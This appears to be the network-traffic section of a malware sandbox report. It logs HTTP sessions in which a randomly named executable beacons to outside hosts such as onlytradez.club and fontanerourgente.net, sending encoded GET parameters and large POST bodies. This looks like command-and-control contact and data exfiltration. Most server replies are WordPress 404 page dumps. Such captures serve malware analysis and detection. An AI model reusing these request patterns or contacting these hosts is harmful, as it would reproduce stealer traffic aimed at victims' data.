4c 4f 31 62 70 58 4c 63 33 38 66 42 [TRUNCATED]
                  Data Ascii: 56gD=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxJTPjcPayEJY7ri/Ct0Xy0xsKXql/6ACWW2aoZKQ8doxSV16yDn4Inwtlh7pb1xyJjrvYDFYZecUa4LiKqSDTPpJsvFRJTPBpFyiY/Bqi6FRtkg8dpEkG/Cr1zD8lXSv+ddffg5nS0lRYiBaI120AQVkOlCeBE3o7/ap9Ho/5eTXpp9AJa+dDVuASdH80pu6GzO8LsQjNsgFwgJECmsh0KhfgBaesiRYi7DbvMVkSIfhaHPXLbyF2G24/ZkWADzbK1oGdrhpSTN8LgrmQteZimPtLO1bpXLc38fBn7s/VzAxFFw0gtjDSn1fLwSrQ1DPX1HmsCGL0U0VM1NaymNIMkyynYTMBf1tkjAxXpN83/BWwC92SUao/Y/ODSX7O/7Wqh63RtC6bkZ0gYRPy0/ZVo7s4OujFEdFm1UdJxXsYpafdamNlV+PxqKRTTs1+y8KtCaSM8FKNR7mSDEywyspHocJHH2F2ag3y59AGjdypbKoXDArESOv7FMGuyCfbCrR8LYQlC+90G1hU83sIMIQfJm6y8lH9YcbgSMMXmACPZB/1FiqUomAB1JuzXij7bwH+zCMdNgbLy2Br/WntWtO0q16ygDc7DAxtkI0z2AiWY0sCFrp60ENfQKyXJ04uSDSO4zQ6g8JfL9X8EwXD2rALid6rr9XmHoD/WX5Jt0rkEtsLO4A7RuPMBJhVjd3V4U7mDoSmJvtr07Yc00vJ+Wbh0VvWXn/jvzR/FeetMAW+I4zhWt0LGFqba1PKjPB3TCabXcMzr+U9pE4egB1fr7Gt5F+YfkEwCy+p+20kBsz8RnQNmAJuwvmpnb+iPxJHDcC39XwrVFyrIsRwNr//t5Rs5cNShgiMCUdwDNjmiXkO+qCJU1z6mHrvTfrOO8U9Y5ZufUxuuZznW+8/YT8BFb9zr168cM3n/XwglB0Q4nxty5D74nuSegnjgozttSiSOiHksK2Ur [TRUNCATED]
                  Sep 4, 2024 09:36:21.662584066 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:21 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                  Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:21.662600040 CEST | 1236 | IN | Data Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                  Sep 4, 2024 09:36:21.662610054 CEST | 1236 | IN | Data Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                  Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                  Sep 4, 2024 09:36:21.662621021 CEST | 672 | IN | Data Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                  Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                  Sep 4, 2024 09:36:21.662780046 CEST | 1236 | IN | Data Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                  Sep 4, 2024 09:36:21.662796974 CEST | 1236 | IN | Data Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                  Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote c
                  Sep 4, 2024 09:36:21.662806988 CEST | 1236 | IN | Data Raw: 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d
                  Data Ascii: ght:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp
                  Sep 4, 2024 09:36:21.662893057 CEST | 1236 | IN | Data Raw: 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 46 46 46 46 46 46 3b 2d 2d 77 70 2d 2d
                  Data Ascii: reset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid
                  Sep 4, 2024 09:36:21.662904024 CEST | 1236 | IN | Data Raw: 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72
                  Data Ascii: dient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradien
                  Sep 4, 2024 09:36:21.662915945 CEST | 1236 | IN | Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 44 31 45 34 44 44 20 30 25 2c 20 23 45 45 45 41
                  Data Ascii: --wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg
                  Sep 4, 2024 09:36:21.667606115 CEST | 1236 | IN | Data Raw: 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77
                  Data Ascii: rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.4 | 49745 | 37.187.158.211 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:23.303534031 CEST | 489 | OUT | GET /t3gh/?56gD=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:36:24.163136005 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:23 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                  Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:24.163294077 CEST | 224 | IN | Data Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.ca
                  Sep 4, 2024 09:36:24.163304090 CEST | 1236 | IN | Data Raw: 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61
                  Data Ascii: nvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width
                  Sep 4, 2024 09:36:24.163316011 CEST1236INData Raw: 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70
                  Data Ascii: mojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionSto
                  Sep 4, 2024 09:36:24.163330078 CEST1236INData Raw: 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62
                  Data Ascii: n(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script>
                  Sep 4, 2024 09:36:24.163383961 CEST1236INData Raw: 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a
                  Data Ascii: embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme
                  Sep 4, 2024 09:36:24.163393974 CEST1236INData Raw: 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61
                  Data Ascii: ing:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-st
                  Sep 4, 2024 09:36:24.163405895 CEST1236INData Raw: 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f
                  Data Ascii: 25em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style>2000<style id='global-styles-inline-css'>:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio-
                  Sep 4, 2024 09:36:24.163419008 CEST1236INData Raw: 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32
                  Data Ascii: et--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp
                  Sep 4, 2024 09:36:24.163431883 CEST1236INData Raw: 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69
                  Data Ascii: rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,r
                  Sep 4, 2024 09:36:24.168266058 CEST1236INData Raw: 2d 73 69 7a 65 2d 2d 65 78 74 72 61 2d 6c 61 72 67 65 3a 20 34 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 3a 20 39 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69
                  Data Ascii: -size--extra-large: 40px;--wp--preset--font-size--huge: 96px;--wp--preset--font-size--gigantic: 144px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp-


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  9 | 192.168.2.4 | 49746 | 167.172.133.32 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:29.306436062 CEST | 754 | OUT | POST /zctj/ HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.onlytradez.club
                  Referer: http://www.onlytradez.club/zctj/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iBOiINqwRoO6WZ4spmmY1HF5qhF7Xm8Lgg==
                  Sep 4, 2024 09:36:29.774034023 CEST | 369 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:29 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Content-Encoding: gzip


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  10 | 192.168.2.4 | 49747 | 167.172.133.32 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:31.870062113 CEST | 774 | OUT | POST /zctj/ HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.onlytradez.club
                  Referer: http://www.onlytradez.club/zctj/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHhK3mMPalBC7gfDlBOKBjDSSPLv7wt6icw=
                  Sep 4, 2024 09:36:32.322825909 CEST | 369 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:32 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Content-Encoding: gzip


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  11 | 192.168.2.4 | 49748 | 167.172.133.32 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:34.489667892 CEST | 10856 | OUT | POST /zctj/ HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.onlytradez.club
                  Referer: http://www.onlytradez.club/zctj/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD= [TRUNCATED]
                  Sep 4, 2024 09:36:34.873713017 CEST | 369 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:34 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Content-Encoding: gzip


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  12 | 192.168.2.4 | 49749 | 167.172.133.32 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:37.038254976 CEST | 484 | OUT | GET /zctj/?56gD=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.onlytradez.club
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:36:37.479125023 CEST | 705 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.26.1
                  Date: Wed, 04 Sep 2024 07:36:37 GMT
                  Content-Type: text/html
                  Content-Length: 555
                  Connection: close
